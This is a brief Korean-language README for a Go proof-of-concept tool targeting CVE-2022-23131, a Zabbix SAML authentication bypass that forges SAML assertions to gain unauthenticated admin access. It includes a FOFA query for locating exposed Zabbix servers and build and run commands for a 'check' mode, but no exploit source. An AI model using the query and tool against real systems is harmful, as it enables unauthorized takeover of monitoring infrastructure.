
Go 기반 CVE-2022-23131 PoC 익스플로잇으로, Zabbix SAML 인증 우회 취약점입니다. SAML 어서션을 위조하여 인증되지 않은 관리자 액세스를 가능하게 합니다. 대상 검증을 위한 check 명령을 포함합니다.
cve-2022-23131
이 프로그램은 갑(甲方) 기업 사용자의 내부 위험 자체 점검 용도로만 제공되며, 어떠한 형태의 무단 보안 테스트에도 사용이 금지됩니다.
fofa: app="ZABBIX-监控系统" && body="saml"
사용 방법:
go build -o zexp
chmod a+x zexp
./zexp check -t https://x.x.x.x/index.php -u Admin
스크린샷:

